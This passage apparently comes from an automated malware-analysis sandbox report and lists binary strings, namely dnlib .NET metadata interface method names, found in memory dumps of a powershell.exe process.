                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
